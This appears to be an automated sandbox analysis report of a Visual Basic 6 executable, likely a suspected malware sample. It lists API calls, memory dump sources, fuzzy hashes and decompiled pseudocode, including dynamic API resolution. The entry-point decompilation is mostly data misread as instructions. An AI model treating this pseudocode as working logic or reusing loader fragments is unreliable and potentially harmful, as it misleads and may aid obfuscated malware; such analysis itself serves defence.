                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,00425E15), ref: 00425E0E
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$#644$LockMoveUnlock$Redim$DestructEraseZero
                                                                                                                                                        • String ID: @
                                                                                                                                                        • API String ID: 2967634309-2766056989
                                                                                                                                                        • Opcode ID: 0156fe0242da43fe8e4af077b7fa65dcb81f70a22853a0c9013c9b41ca205c2d
                                                                                                                                                        • Instruction ID: a1cafa95255c5016552754455002177715d8fa8193840c336f6d3372f31e94a0
                                                                                                                                                        • Opcode Fuzzy Hash: 0156fe0242da43fe8e4af077b7fa65dcb81f70a22853a0c9013c9b41ca205c2d
                                                                                                                                                        • Instruction Fuzzy Hash: E9814BB0E102189FDB04DFA8C898EEEBBB9FF48710F11811AE505A7351DB74A905CFA0
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00425800, Relevance: 31.7, APIs: 21, Instructions: 191COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaUbound.MSVBVM60(00000001), ref: 00425857
                                                                                                                                                        • #644.MSVBVM60(?), ref: 0042586D
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?), ref: 0042587D
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 0042588B
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0042589A
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,00000004), ref: 004258C1
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 004258D2
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 004258E0
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004258E9
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 004258F3
                                                                                                                                                        • #644.MSVBVM60(00401002), ref: 00425904
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 0042590D
                                                                                                                                                        • #644.MSVBVM60(?), ref: 00425913
                                                                                                                                                          • Part of subcall function 00425A20: __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000005,00000000,660DC6D9,660DDE99,660DC6FC), ref: 00425A71
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarMove.MSVBVM60 ref: 00425A9B
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425ACB
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425AEA
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B09
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B28
                                                                                                                                                          • Part of subcall function 00425A20: __vbaVarZero.MSVBVM60 ref: 00425B4B
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,?,00000011,00000001,?,00000000,?,?,?,?,?,?), ref: 00425979
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?), ref: 0042598C
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 0042599A
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004259A3
                                                                                                                                                        • __vbaAryLock.MSVBVM60(?,?), ref: 004259AD
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 004259BB
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(?), ref: 004259C3
                                                                                                                                                        • __vbaAryDestruct.MSVBVM60(00000000,?,00425A01,?,?,?,?,?,?), ref: 004259FA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$#644$LockUnlockZero$Redim$DestructMoveUbound
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2865909624-0
                                                                                                                                                        • Opcode ID: 84b6e170ea9abed9bc13eceb44eb17d6254963e3d9082e5601c6c08072ef74d5
                                                                                                                                                        • Instruction ID: 62c9c8708fe8560cdbb817fc313b1843ea4ccb4934becc3a864a704b5cb76ea8
                                                                                                                                                        • Opcode Fuzzy Hash: 84b6e170ea9abed9bc13eceb44eb17d6254963e3d9082e5601c6c08072ef74d5
                                                                                                                                                        • Instruction Fuzzy Hash: FF71FAB1E10218AFDB04DFA8DD85EEEBBB9FF88710F10811AE505A7254DB74A945CF60
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428DE0, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 108COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 16%
                                                                                                                                                        			E00428DE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				char _v44;
				intOrPtr _v52;
				char _v60;
				intOrPtr _v68;
				char _v76;
				intOrPtr _v84;
				char _v92;
				int _v160;
				void* _t40;
				int _t42;
				int _t44;
				void* _t48;
				void* _t52;
				intOrPtr* _t70;
				void* _t71;
				void* _t73;
				void* _t76;
				intOrPtr _t77;

				_t77 = _t76 - 8;
				_push(0x401006);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t77;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = _t77 - 0x9c;
				_v8 = 0x598320;
				_v28 = 0;
				_v44 = 0;
				_v60 = 0;
				_v76 = 0;
				_v92 = 0;
				_v160 = 0x16;
				_t40 = E00428F70(0, __edi, __esi,  &_v160); // executed
				_t73 = _t40;
				_v24 = _t73;
				if(_t73 == 0) {
					__imp__#685();
					__imp____vbaObjSet( &_v28, _t40);
					_t71 = _t40;
					_v92 = 0xa;
					_v76 = 0xa;
					_v60 = 0xa;
					_v44 = 0xa;
					_v84 = 0x80020004;
					_v68 = 0x80020004;
					_v52 = 0x80020004;
					_v36 = 0x80020004;
					_t52 =  *((intOrPtr*)( *_t71 + 0x44))(_t71, 7,  &_v44,  &_v60,  &_v76,  &_v92);
					asm("fclex");
					if(_t52 < 0) {
						__imp____vbaHresultCheckObj(_t52, _t71, 0x403088, 0x44);
					}
					__imp____vbaFreeObj();
					__imp____vbaFreeVarList(4,  &_v44,  &_v60,  &_v76,  &_v92);
				}
				RtlFillMemory(_t73, 0x16, 0);
				_t70 = __imp__#644;
				_t42 =  *_t70(_a8);
				_t31 = _t73 + 8; // 0x8
				_v160 = _t42;
				E004253CD(_t42, _t31);
				_t44 =  *_t70(_a4);
				_t34 = _t73 + 4; // 0x4
				_v160 = _t44;
				E004253CD(_t44, _t34);
				_v160 = 0x42495f;
				E004253CD( *_t70( &_v160), _t73);
				_t48 = E00424CD9();
				_push(E00428F4E);
				return _t48;
			}


























                                                                                                                                                        0x00428de3
                                                                                                                                                        0x00428de6
                                                                                                                                                        0x00428df1
                                                                                                                                                        0x00428df2
                                                                                                                                                        0x00428dff
                                                                                                                                                        0x00428e00
                                                                                                                                                        0x00428e01
                                                                                                                                                        0x00428e02
                                                                                                                                                        0x00428e05
                                                                                                                                                        0x00428e15
                                                                                                                                                        0x00428e18
                                                                                                                                                        0x00428e1b
                                                                                                                                                        0x00428e1e
                                                                                                                                                        0x00428e21
                                                                                                                                                        0x00428e24
                                                                                                                                                        0x00428e2e
                                                                                                                                                        0x00428e33
                                                                                                                                                        0x00428e37
                                                                                                                                                        0x00428e3a
                                                                                                                                                        0x00428e40
                                                                                                                                                        0x00428e4b
                                                                                                                                                        0x00428e51
                                                                                                                                                        0x00428e5d
                                                                                                                                                        0x00428e60
                                                                                                                                                        0x00428e63
                                                                                                                                                        0x00428e66
                                                                                                                                                        0x00428e69
                                                                                                                                                        0x00428e6c
                                                                                                                                                        0x00428e6f
                                                                                                                                                        0x00428e72
                                                                                                                                                        0x00428e8a
                                                                                                                                                        0x00428e8f
                                                                                                                                                        0x00428e91
                                                                                                                                                        0x00428e9c
                                                                                                                                                        0x00428e9c
                                                                                                                                                        0x00428ea5
                                                                                                                                                        0x00428ebd
                                                                                                                                                        0x00428ec3
                                                                                                                                                        0x00428eca
                                                                                                                                                        0x00428ed3
                                                                                                                                                        0x00428eda
                                                                                                                                                        0x00428edc
                                                                                                                                                        0x00428edf
                                                                                                                                                        0x00428ee7
                                                                                                                                                        0x00428ef0
                                                                                                                                                        0x00428ef2
                                                                                                                                                        0x00428ef5
                                                                                                                                                        0x00428efd
                                                                                                                                                        0x00428f08
                                                                                                                                                        0x00428f17
                                                                                                                                                        0x00428f1c
                                                                                                                                                        0x00428f21
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00428F70: __vbaRedim.MSVBVM60(00000080,00000001,00599258,00000011,00000001,00004000,00000000,66106AEE,660DDE99,00000000), ref: 00428FBD
                                                                                                                                                          • Part of subcall function 00428F70: __vbaAryLock.MSVBVM60(00000000,00000000,66106AEE,660DDE99,00000000), ref: 00428FD2
                                                                                                                                                          • Part of subcall function 00428F70: #644.MSVBVM60(00000000), ref: 00428FEF
                                                                                                                                                          • Part of subcall function 00428F70: __vbaAryUnlock.MSVBVM60(00000000), ref: 00428FFB
                                                                                                                                                        • #685.MSVBVM60(?,66106AEE,660DDE99,660DC30A), ref: 00428E40
                                                                                                                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00428E4B
                                                                                                                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00403088,00000044), ref: 00428E9C
                                                                                                                                                        • __vbaFreeObj.MSVBVM60 ref: 00428EA5
                                                                                                                                                        • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 00428EBD
                                                                                                                                                        • RtlFillMemory.KERNEL32 ref: 00428ECA
                                                                                                                                                        • #644.MSVBVM60(00401006), ref: 00428EDA
                                                                                                                                                        • #644.MSVBVM60(?,00000000,00000008), ref: 00428EF0
                                                                                                                                                        • #644.MSVBVM60(00000016,00000000,00000004), ref: 00428F13
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$#644$Free$#685CheckFillHresultListLockMemoryRedimUnlock
                                                                                                                                                        • String ID: _IB
                                                                                                                                                        • API String ID: 1484531433-566781039
                                                                                                                                                        • Opcode ID: 46fc3cb14c093be5382021ea2490b8cba58345a5e6967f9d21817457b91ef54c
                                                                                                                                                        • Instruction ID: 175c57c9f36baefb0e3e4945e52ba3231d098d26f2566b5da7c2f0b020bf42a1
                                                                                                                                                        • Opcode Fuzzy Hash: 46fc3cb14c093be5382021ea2490b8cba58345a5e6967f9d21817457b91ef54c
                                                                                                                                                        • Instruction Fuzzy Hash: F64128B0D00219EFDB10DFA5DC89EEEBBB8EF48714F50451EF509A2240EB745949CB64
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00428F70, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • __vbaRedim.MSVBVM60(00000080,00000001,00599258,00000011,00000001,00004000,00000000,66106AEE,660DDE99,00000000), ref: 00428FBD
                                                                                                                                                        • __vbaAryLock.MSVBVM60(00000000,00000000,66106AEE,660DDE99,00000000), ref: 00428FD2
                                                                                                                                                        • #644.MSVBVM60(00000000), ref: 00428FEF
                                                                                                                                                        • __vbaAryUnlock.MSVBVM60(00000000), ref: 00428FFB
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __vba$#644LockRedimUnlock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3120749027-0
                                                                                                                                                        • Opcode ID: 79f97d8504f79186c852644f41baa86bd844385957d3e233e69fc71f3e22a813
                                                                                                                                                        • Instruction ID: fad884281197400a9b83d32576c0ab6889653510ed80e70d169a4f89f689ca70
                                                                                                                                                        • Opcode Fuzzy Hash: 79f97d8504f79186c852644f41baa86bd844385957d3e233e69fc71f3e22a813
                                                                                                                                                        • Instruction Fuzzy Hash: BA118F78A40304EFDB14DF58DD8AFAA7BB5FB14B10F16814AF905AB3A0C774A844DB94
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0042504B, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 69libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                        			E0042504B(void* __ecx, intOrPtr* _a4) {
				char _v524;
				void* _t16;
				struct HINSTANCE__* _t21;
				_Unknown_base(*)()* _t24;
				struct HINSTANCE__* _t26;
				void* _t33;
				char* _t38;
				char* _t41;

				_t38 = 0x424a5a;
				_t33 = 0x599024;
				while( *_t38 != 0xe7) {
					E0042500D(_t16, _t38);
					E0042533D( &_v524, "SysAllocStringByteLen", 0xffffffff);
					_t21 = E004251CF( &_v524); // executed
					if(_t21 != 0) {
						_t26 = _t21;
						_t16 = 0xe7;
						asm("repne scasw");
						_t41 = _t38;
						while( *_t41 != 0xe7) {
							E0042502F(_t16, _t41);
							_t24 = GetProcAddress(_t26, "SysAllocStringByteLen");
							if(_t24 != 0) {
								asm("stosd");
								_t16 = 0xe7;
								asm("repne scasb");
								continue;
							}
							return _t24;
						}
						_t38 = _t41 + 1;
						continue;
					}
					return _t21;
				}
				 *0x59900c = 1;
				 *0x0059900E = 1;
				 *0x00599010 = 4;
				 *0x00599014 = 0;
				 *0x00599018 = _t33 - 0x80;
				 *0x0059901C = 0x20;
				 *0x00599020 = 0;
				 *_a4 = 0x59900c;
				return  !0x00000000;
			}











                                                                                                                                                        0x00425057
                                                                                                                                                        0x0042505c
                                                                                                                                                        0x00425061
                                                                                                                                                        0x00425069
                                                                                                                                                        0x0042507c
                                                                                                                                                        0x00425088
                                                                                                                                                        0x00425090
                                                                                                                                                        0x00425094
                                                                                                                                                        0x0042509b
                                                                                                                                                        0x004250a1
                                                                                                                                                        0x004250a4
                                                                                                                                                        0x004250a6
                                                                                                                                                        0x004250ac
                                                                                                                                                        0x004250b9
                                                                                                                                                        0x004250c2
                                                                                                                                                        0x004250c6
                                                                                                                                                        0x004250ce
                                                                                                                                                        0x004250d0
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004250d2
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004250c2
                                                                                                                                                        0x004250d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x004250d6
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00425090
                                                                                                                                                        0x004250e6
                                                                                                                                                        0x004250eb
                                                                                                                                                        0x004250f1
                                                                                                                                                        0x004250f8
                                                                                                                                                        0x004250fb
                                                                                                                                                        0x004250fe
                                                                                                                                                        0x00425105
                                                                                                                                                        0x0042510b
                                                                                                                                                        0x00000000

                                                                                                                                                        APIs
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,SysAllocStringByteLen), ref: 004250B9
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 0000001B.00000002.360553952.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                        • Associated: 0000001B.00000002.360543174.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360729782.0000000000598000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360740463.0000000000599000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 0000001B.00000002.360749965.000000000059B000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AddressProc
                                                                                                                                                        • String ID: SysAllocStringByteLen
                                                                                                                                                        • API String ID: 190572456-3231582829
                                                                                                                                                        • Opcode ID: 29a8b8e0612bd475cf01a77670abe8145000d650d50f4471198aa562c1213045
                                                                                                                                                        • Instruction ID: d9df9b17002565671bb2ce06b5095957153841faa43adbd60f874df3b885901f
                                                                                                                                                        • Opcode Fuzzy Hash: 29a8b8e0612bd475cf01a77670abe8145000d650d50f4471198aa562c1213045
                                                                                                                                                        • Instruction Fuzzy Hash: 23113A36A00B309AC7209F28EC08B5BB7F4EB84314F50CA2ED07687291EBBC554587D9
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 0040121C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 88%
                                                                                                                                                        			_entry_(signed int __eax, void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __fp0, char _a1, char _a121) {
				void* _v16;
				void* _v28;
				void* _v32;
				void* _v36;
				void* _v48;
				void* _v56;
				void* _v60;
				void* _v76;
				void* _v80;
				intOrPtr _v97;
				intOrPtr* _t165;
				void* _t166;
				signed char _t168;
				intOrPtr* _t171;
				intOrPtr* _t172;
				intOrPtr* _t178;
				intOrPtr* _t179;
				intOrPtr* _t182;
				intOrPtr* _t183;
				void* _t184;
				signed char _t186;
				signed char _t188;
				signed char _t193;
				signed char _t194;
				signed char _t196;
				intOrPtr* _t262;
				signed int _t264;
				signed int _t266;
				signed int _t267;
				intOrPtr* _t269;
				void* _t271;
				intOrPtr* _t273;
				void* _t274;
				intOrPtr* _t279;
				intOrPtr* _t281;
				intOrPtr* _t283;
				signed char _t285;
				intOrPtr* _t287;
				signed char _t292;
				intOrPtr* _t296;
				intOrPtr* _t299;
				signed int _t303;
				signed int _t305;
				void* _t311;
				char* _t312;
				signed int _t314;
				signed int _t315;
				void* _t319;
				void* _t322;
				intOrPtr _t333;
				void* _t356;

				_t356 = __fp0;
				_t299 = __edi;
				_push("VB5!6&VB6DE.DLL"); // executed
				L00401216(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				_t165 = __eax - 1;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *__edi =  *__edi + __ecx;
				_t315 = _t314 &  *(__edi + 0x38);
				asm("fisttp word [eax+0x45]");
				 *(__edi + 2) =  *(__edi + 2) ^ 0x00000024;
				_t279 = _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				_t271 = __ebx + 1;
				asm("popad");
				asm("o16 jae 0x6b");
				asm("o16 jae 0x6a");
				asm("insd");
				_t303 =  *(_t271 + 0x65) * 0x66;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t165 =  *_t165 + _t165;
				 *_t303 =  *_t303 + _t165;
				 *_t165 =  *_t165 + _t165;
				0xb[_t303] =  &(0xb[0xb[_t303]]);
				_t166 = _t165 + 1;
				 *_t279 =  *_t279 + _t166;
				 *0xb =  *0xb + _t166;
				_t168 = _t166 + 0x0000000b &  *(_t166 + 0xb);
				 *_t168 =  *_t168 + _t168;
				 *_t168 =  *_t168 + _t168;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t168 =  *_t168 + _t168;
				 *_t168 =  *_t168 + _t168;
				_t171 = _t279;
				_pop(_t281);
				 *_t171 =  *_t171 + _t171;
				 *_t171 =  *_t171 + _t171;
				_t172 = _t171 + 0xb;
				asm("insb");
				 *_t172 =  *_t172 + _t172;
				 *_t172 =  *_t172 + _t172;
				 *_t172 =  *_t172 + _t172;
				 *_t172 =  *_t172 + _t172;
				 *_t281 =  *_t281 + 0x13;
				 *0x00000026 =  *((intOrPtr*)(0x26)) + 0x13;
				 *0xb =  *0xb << 1;
				 *0x00000014 =  *((intOrPtr*)(0x14)) + 0x14;
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 0x14;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 1;
				 *((intOrPtr*)(0x14)) =  *((intOrPtr*)(0x14)) + 0x14;
				asm("cld");
				_t178 = _t281;
				_pop(_t283);
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				asm("out dx, eax");
				asm("insb");
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				asm("in al, dx");
				asm("adc al, [eax]");
				 *_t178 =  *_t178 + _t178;
				 *_t178 =  *_t178 + _t178;
				 *0xb =  *0xb << 1;
				_t179 = _t178 + 1;
				 *_t179 =  *_t179 + _t179;
				 *_t179 =  *_t179 + _t179;
				_t273 = _t271 + _t271 + _t271 + _t271;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t179 =  *_t179 + 1;
				 *_t179 =  *_t179 + _t179;
				 *_t273 =  *_t273 + 0x12;
				_t182 = _t283;
				_t285 = es;
				 *_t182 =  *_t182 + _t182;
				 *_t182 =  *_t182 + _t182;
				_t183 = _t182 + _t182;
				 *(_t183 + 6) =  *(_t183 + 6) ^ 0x00000000;
				 *_t183 =  *_t183 + _t183;
				 *_t183 =  *_t183 + _t183;
				 *_t183 =  *_t183 + _t183;
				 *_t183 =  *_t183 + _t183;
				 *_t183 =  *_t183 + _t183;
				 *((intOrPtr*)(_t273 + 0xb)) =  *((intOrPtr*)(_t273 + 0xb)) + _t183;
				_t184 = _t183 + 1;
				 *_t285 =  *_t285 + _t184;
				 *_t285 =  *_t285 + _t184;
				_t186 = _t184 + 0x0000000b &  *(_t184 + 0xb);
				 *_t186 =  *_t186 + _t186;
				 *_t186 =  *_t186 + _t186;
				asm("invalid");
				asm("invalid");
				asm("invalid");
				asm("invalid");
				 *_t186 =  *_t186 + _t186;
				 *_t186 =  *_t186 + _t186;
				asm("in al, dx");
				_t188 = _t285;
				_t287 = _t315;
				 *_t188 =  *_t188 + _t188;
				 *_t188 =  *_t188 + _t188;
				_t21 = _t188 - 0x5d;
				 *_t21 =  *((intOrPtr*)(_t188 - 0x5d)) + 0xb;
				if( *_t21 != 0) {
					 *_t188 =  *_t188 + _t188;
					 *_t188 =  *_t188 & _t188;
					 *_t188 =  *_t188 + _t188;
				}
				 *_t188 =  *_t188 + _t188;
				if( *_t188 == 0) {
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *_t273 =  *_t273 + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x2b =  *0x2b + 0x2b;
					 *0x0000002B =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *0x4C004073 =  *((intOrPtr*)(0x4c004073)) + 0xb;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0xb;
					 *((intOrPtr*)(0x2b)) =  *((intOrPtr*)(0x2b)) + 0x2b;
					_t191 = 0x5d2cee9d;
					_push(_t273);
					if( *((intOrPtr*)(0x2b)) == 0) {
						_v97 = _v97 - 0xf4f41550;
						_t264 = _t315;
						_t315 = 0x5d2cee9d;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						 *_t264 =  *_t264 + _t264;
						_t266 = _t264 + 0x80000000 +  *((intOrPtr*)(_t264 + 0x80000000));
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *_t266 =  *_t266 + _t266;
						 *((intOrPtr*)(_t287 + 4)) =  *((intOrPtr*)(_t287 + 4)) + _t287;
						 *_t266 =  *_t266 + _t266;
						 *((intOrPtr*)(0x5d2cee9d + _t266 * 2)) =  *((intOrPtr*)(0x5d2cee9d + _t266 * 2)) + _t266;
						_t267 = _t266 + 1;
						 *((intOrPtr*)(_t267 + _t267 + 0x42560000)) =  *((intOrPtr*)(_t267 + _t267 + 0x42560000)) + _t273;
						_t191 = _t267 ^ 0x56263621;
					}
					_t312 =  &_a1;
					_t319 = _t315 + 2;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *0x0000000C =  *((intOrPtr*)(0xc)) + _t287;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *_t191 =  *_t191 + _t191;
					 *((intOrPtr*)(0xc)) =  *((intOrPtr*)(0xc)) + _t287;
					 *_t299 =  *_t299 + _t191;
					 *_t287 =  *_t287 + _t287;
					_t193 = _t191;
					 *_t193 =  *_t193 + 0xc;
					_t305 = 0x1fc;
					_t296 = 0xd;
					 *((intOrPtr*)(_t319 + 0xfffffffff033004d)) =  *((intOrPtr*)(_t319 + 0xfffffffff033004d)) + 0xd;
					 *_t193 =  *_t193 ^ _t193;
					_t274 = _t273 + _t273;
					asm("invalid");
					 *_t193 =  *_t193 | _t193;
					 *_t193 =  *_t193 + _t193;
					 *_t193 =  *_t193 + _t193;
					 *_t193 =  *_t193 + _t193;
					_t194 = _t193 +  *_t193;
					 *_t194 =  *_t194 | _t194;
					goto 0x6040144d;
					asm("adc eax, [eax]");
					asm("insb");
					 *((intOrPtr*)(0xd)) =  *((intOrPtr*)(0xd)) - 0xd;
					_t196 = (_t194 ^  *_t194) + 1;
					 *_t196 =  *_t196 + _t274;
					 *_t196 =  *_t196 + _t196;
					 *_t196 =  *_t196 + _t196;
					asm("lahf");
					 *_t196 =  *_t196 + _t196;
